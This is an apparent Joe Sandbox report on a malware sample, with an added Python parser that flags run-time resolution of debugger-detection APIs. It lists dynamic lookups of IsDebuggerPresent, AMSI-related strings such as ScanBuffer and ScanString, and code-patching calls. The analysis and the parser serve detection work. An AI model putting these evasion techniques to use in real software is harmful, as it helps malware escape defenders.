                                                                            • Instruction ID: 28420439c1148ca829847bfeb3a07d01af881162271943a8b9c80644387594e4
                                                                            • Opcode Fuzzy Hash: a26ab34030ba2f3f9e5a4196a65f430a67e9f1ae8e5f7320120bb0ea74a076cd
                                                                            • Instruction Fuzzy Hash: D201F2BD2002846FF715FA6CCD11B6F739DDB81710F510162E500E6AC1E6799E108A66
                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(?,00000000,0288ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0288AB2F
                                                                              • Part of subcall function 0288A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0288A7E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread
                                                                            • String ID: eeee$ggg$yyyy
                                                                            • API String ID: 4232894706-1253427255
                                                                            • Opcode ID: 53623aeb6759a9069556ddd9448423a487847df6f83fdd3b1f2e7637eaa1babd
                                                                            • Instruction ID: 5669379917e156043cafb08452c0ae6f41d342ec408248cad633747dd21c4c16
                                                                            • Opcode Fuzzy Hash: 53623aeb6759a9069556ddd9448423a487847df6f83fdd3b1f2e7637eaa1babd
                                                                            • Instruction Fuzzy Hash: 3641B17D7041094BF719FA7CC9806BEB3EBDB85204B544527D652C33C4EAB8ED06CA66
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • RtlMoveMemory.NTDLL(?,?,?), ref: 02897ED7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$MemoryMove
                                                                            • String ID: Ntdll$RtlM$oveM
                                                                            • API String ID: 2705147948-1610840992
                                                                            • Opcode ID: f3af39564556aef63df3d03e0f2eee1031d9dbe5a7d9d089d644ddfe68b44102
                                                                            • Instruction ID: 727faa2ebce54edd76afbd511bed5a1b4893e061d8ef4aef1e8f8e5d8105a49c
                                                                            • Opcode Fuzzy Hash: f3af39564556aef63df3d03e0f2eee1031d9dbe5a7d9d089d644ddfe68b44102
                                                                            • Instruction Fuzzy Hash: A50171BD694249BFFF00EB98EC42F6AB7D9EB09B10F544490B901E6A40D678B9108A25
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc
                                                                            • String ID: AeldnaHeludoMteG$KernelBASE
                                                                            • API String ID: 1883125708-1952140341
                                                                            • Opcode ID: 252120c665774b2647abc783204641a5e1481498554e7edff8a06980958eb0e5
                                                                            • Instruction ID: e388bf73cc9214b3ff55f40ac1e33931976b9bae52586da94bd6ca89db82c5bd
                                                                            • Opcode Fuzzy Hash: 252120c665774b2647abc783204641a5e1481498554e7edff8a06980958eb0e5
                                                                            • Instruction Fuzzy Hash: 72F0627DA44745AFEB10FBE8EC419A9B7EDE74AB10B514461B800C3710E674AE10C926
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KernelBase,?,0289FAEB,UacInitialize,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,ScanString,02907380,028AB7B8,Initialize), ref: 0289F6EE
                                                                            • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0289F700
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: IsDebuggerPresent$KernelBase
                                                                            • API String ID: 1646373207-2367923768
                                                                            • Opcode ID: 968a7f31187042b72ddbec254ef61f049e4294f6df8c5b809e0430428114011a
                                                                            • Instruction ID: 7f5b09a4d06e1f47df8c6ac0a9497c1d220f31d138382cd0b36c77059e900b25
                                                                            • Opcode Fuzzy Hash: 968a7f31187042b72ddbec254ef61f049e4294f6df8c5b809e0430428114011a
                                                                            • Instruction Fuzzy Hash: FBD012BD3603E039BE04B2F82CC481D038C897452D3280E20B226C6593F6AB88155015
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,028AD10B,00000000,028AD11E), ref: 0288C47A
                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0288C48B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                            • API String ID: 1646373207-3712701948
                                                                            • Opcode ID: e8ed7e4bbb747dd7b5288f8706aa257a240a013dc576f1587ea6e3574fa4d170
                                                                            • Instruction ID: 5e202d2ffdbfe20a9c52df2efcccb90731fb4f3ad70aca0fff711c4b91efb8db
                                                                            • Opcode Fuzzy Hash: e8ed7e4bbb747dd7b5288f8706aa257a240a013dc576f1587ea6e3574fa4d170
                                                                            • Instruction Fuzzy Hash: 29D05EECA403549EF744BAB5548063126988708311B10CC36E401D5246EBA658948F29
                                                                            APIs
                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0288E297
                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0288E2B3
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0288E32A
                                                                            • VariantClear.OLEAUT32(?), ref: 0288E353
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                            • String ID:
                                                                            • API String ID: 920484758-0
                                                                            • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                            • Instruction ID: b4459c64975e3e11b48ad6e34ca831c587db4d99df3ce67ebe0885a890c2ec24
                                                                            • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                            • Instruction Fuzzy Hash: CB41E77DA012299BCB62EB99C890BD9B3BDAB49314F0445D5F548E7211DB30AF808F52
                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AD59
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AD7D
                                                                            • GetModuleFileNameA.KERNEL32(02880000,?,00000105), ref: 0288AD98
                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0288AE2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                            • String ID:
                                                                            • API String ID: 3990497365-0
                                                                            • Opcode ID: 2c869e78a4378ccf1538a9a13555ec8dcf172435802cf037fbf6fec79dce38cb
                                                                            • Instruction ID: a90a6d0972cdb66384ef3f4715d4343e0af769f20204fbf2f96fea0302d479f7
                                                                            • Opcode Fuzzy Hash: 2c869e78a4378ccf1538a9a13555ec8dcf172435802cf037fbf6fec79dce38cb
                                                                            • Instruction Fuzzy Hash: A2413D7DA4025C9FDB21EB68CC84BDAB7FDAB08300F4405E6A648E7241E774AF848F51
                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AD59
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AD7D
                                                                            • GetModuleFileNameA.KERNEL32(02880000,?,00000105), ref: 0288AD98
                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0288AE2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                            • String ID:
                                                                            • API String ID: 3990497365-0
                                                                            • Opcode ID: ab68c23db2d27ed4d2ad4e3c62598aec2930df35339fec588cf304784b6dbcea
                                                                            • Instruction ID: 3726c1c618e4fab46beaeaa67babac23e24e4738a2a0d556c351758da158f9d9
                                                                            • Opcode Fuzzy Hash: ab68c23db2d27ed4d2ad4e3c62598aec2930df35339fec588cf304784b6dbcea
                                                                            • Instruction Fuzzy Hash: 69414E7DA4025C9FDB21EB68CC84BDAB7FDAB08300F4405E6A648E7241E774AF848F51
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1b0241664fac4f79b4aa5faa6f9882c8613858ff254f6e1791c2eac180c34db
                                                                            • Instruction ID: 5c5f7362434ff5bf8aef853017c7b6e8b210cc4b2ab55d34e683f7da31622c55
                                                                            • Opcode Fuzzy Hash: c1b0241664fac4f79b4aa5faa6f9882c8613858ff254f6e1791c2eac180c34db
                                                                            • Instruction Fuzzy Hash: FDA103AE7106040BD718BA7C9D883BDB3C69BC4325F18827EE21DCB785EF68D9538651
                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028895DA), ref: 02889572
                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028895DA), ref: 02889578
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: DateFormatLocaleThread
                                                                            • String ID: yyyy
                                                                            • API String ID: 3303714858-3145165042
                                                                            • Opcode ID: 13ffb8f90c2236e20c277624fc3eb6a8990424fa65aacd3bfe64ffc1c471e22c
                                                                            • Instruction ID: c0403473193cde451c9e85a47d8e8307c606f63b0a5de15c5913ea765a7001a2
                                                                            • Opcode Fuzzy Hash: 13ffb8f90c2236e20c277624fc3eb6a8990424fa65aacd3bfe64ffc1c471e22c
                                                                            • Instruction Fuzzy Hash: BE215C7DA002589FDB10EFA8C981ABEB3F9EF09700F5140A5E909E7351E7309E40CB66
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,028983C2), ref: 028983A4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                            • String ID: FlushInstructionCache$Kernel32
                                                                            • API String ID: 3811539418-184458249
                                                                            • Opcode ID: 7dd6729531eec8def7a0ad063833b75cc1cff76641a5eebaa273a7a0ca00b0aa
                                                                            • Instruction ID: 768ec5e94a0b5cf994670b9060ffe30012908c8c886437fbcd1de70df84f64eb
                                                                            • Opcode Fuzzy Hash: 7dd6729531eec8def7a0ad063833b75cc1cff76641a5eebaa273a7a0ca00b0aa
                                                                            • Instruction Fuzzy Hash: E5014B7D64430AAFEF00EEE8EC41B9A77EDEB0AB10F554460B900D6640D674BD109A26
                                                                            APIs
                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0289AF58
                                                                            • IsBadWritePtr.KERNEL32(?,00000004), ref: 0289AF88
                                                                            • IsBadReadPtr.KERNEL32(?,00000008), ref: 0289AFA7
                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0289AFB3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Read$Write
                                                                            • String ID:
                                                                            • API String ID: 3448952669-0
                                                                            • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                            • Instruction ID: ef75cd2a39c1d0998c64f650c4c15ca601c6d9588874f2e7a91d3212484b4d2e
                                                                            • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                            • Instruction Fuzzy Hash: 6421B1BE64061A9BDF14DF69CC80BAE73A9EF80322F048511FD14E7781E734E8118AA0
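The per-function "APIs" blocks above are the quickest place to see that this sample resolves APIs such as IsDebuggerPresent at run time (GetModuleHandleW on KernelBase followed by GetProcAddress) instead of importing them, which keeps them out of the static import table. The following parser is an added example, not part of the Joe Sandbox report or its tooling: it reads blocks in the text form shown on this page, recovers the (module, procedure) pairs each function resolves dynamically, and flags functions that resolve debugger-detection APIs. The record and field names, and the list of flagged API names, are our own choices; the embedded sample is an excerpt of the blocks above with the hash and similarity lines trimmed.

```python
"""Parse Joe Sandbox 'APIs' blocks and flag run-time resolution of anti-debug APIs.

Added example; not part of the Joe Sandbox report or its tooling.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One API-call line, with or without the "Part of subcall function" prefix, e.g.
#   • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0289F700
#   • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str               # API name, e.g. GetProcAddress
    module: str             # DLL the sandbox attributed the call to, e.g. KERNEL32
    args: Tuple[str, ...]   # stack arguments as recovered by the sandbox ("?" = unknown)
    ref: str                # call-site address inside the dumped region
    subcall: Optional[str]  # callee address when the call sits in a sub-function


@dataclass
class FunctionRecord:
    opcode_id: str = ""     # the block's "Opcode ID" hash (our key for the function)
    calls: List[ApiCall] = field(default_factory=list)


def parse_report(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per block. A block opens with "APIs" (or, for a function
    without API calls, directly with "Memory Dump Source") and closes at "Opcode ID"."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (line == "Memory Dump Source" and current is None):
            current = FunctionRecord()
            records.append(current)
        elif line.startswith("• Opcode ID:") and current is not None:
            current.opcode_id = line.split(":", 1)[1].strip()
            current = None
        elif current is not None:
            m = API_LINE.match(line)
            if m:
                args = tuple(a.strip() for a in m.group("args").split(","))
                current.calls.append(ApiCall(m.group("name"), m.group("module"),
                                             args, m.group("ref"), m.group("sub")))
    return records


def dynamic_imports(record: FunctionRecord) -> List[Tuple[str, str]]:
    """(module, procedure) pairs resolved via GetProcAddress; the module comes from the
    latest GetModuleHandle*/LoadLibrary* call in the block. The sandbox recovers
    arguments from stack snapshots, so stale values appear (the page itself shows a
    GetProcAddress(00000000,Kernel32)); confirm hits in the disassembly."""
    pairs: List[Tuple[str, str]] = []
    module = "?"
    for call in record.calls:
        if call.name.startswith(("GetModuleHandle", "LoadLibrary")) and call.args:
            module = call.args[0]
        elif call.name == "GetProcAddress" and len(call.args) >= 2 and call.args[1] != "?":
            pairs.append((module, call.args[1]))
    return pairs


# Debugger-detection APIs worth flagging when resolved at run time (our own list).
ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                   "NtQueryInformationProcess", "OutputDebugStringA"}


def flag_anti_debug(records: List[FunctionRecord]) -> List[str]:
    """Opcode IDs of functions that resolve a debugger-detection API dynamically."""
    return [r.opcode_id for r in records
            if any(proc in ANTI_DEBUG_APIS for _, proc in dynamic_imports(r))]


# Excerpt of three blocks from the report above (hash/similarity lines trimmed).
SAMPLE = """
APIs
• GetModuleHandleW.KERNEL32(KernelBase,?,0289FAEB,UacInitialize,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,ScanString,02907380,028AB7B8,Initialize), ref: 0289F6EE
• GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0289F700
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Opcode ID: 968a7f31187042b72ddbec254ef61f049e4294f6df8c5b809e0430428114011a
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,028AD10B,00000000,028AD11E), ref: 0288C47A
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0288C48B
Memory Dump Source
• Opcode ID: e8ed7e4bbb747dd7b5288f8706aa257a240a013dc576f1587ea6e3574fa4d170
APIs
  • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
  • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
  • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
  • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
  • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,028983C2), ref: 028983A4
Memory Dump Source
• Opcode ID: 7dd6729531eec8def7a0ad063833b75cc1cff76641a5eebaa273a7a0ca00b0aa
"""

if __name__ == "__main__":
    for rec in parse_report(SAMPLE):
        print(rec.opcode_id[:16], dynamic_imports(rec))
    print("anti-debug:", flag_anti_debug(parse_report(SAMPLE)))
```

Run against the full page text and the first block is the only one flagged; the third block illustrates why the output is a lead rather than a verdict, since the stale stack value "Kernel32" is reported as a procedure name.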

                                                                            Execution Graph

                                                                            Execution Coverage:4%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0.6%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:11
                                                                            execution_graph: the node and edge listing of the interactive graph is omitted here because it does not render as text (the dump is also cut off mid-graph). Entry nodes present in the dump: b268e0, b26910, b16ec0, b16903. Windows APIs named on the graph nodes: RegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegCreateKeyExW, RegSetValueExW, RegDeleteKeyExW, RegDeleteValueW, RegCloseKey, GetLastError, SetLastError, ApiSetQueryApiSetPresence, SetUnhandledExceptionFilter, Sleep, GetCurrentThreadId, OpenThread, HeapSetInformation, wcsrchr. CRT start-up nodes: _amsg_exit, _initterm, __IsNonwritableInCurrentImage. Several subgraphs are collapsed in the dump as "448 API calls", "453 API calls", "465 API calls" and "466 API calls".
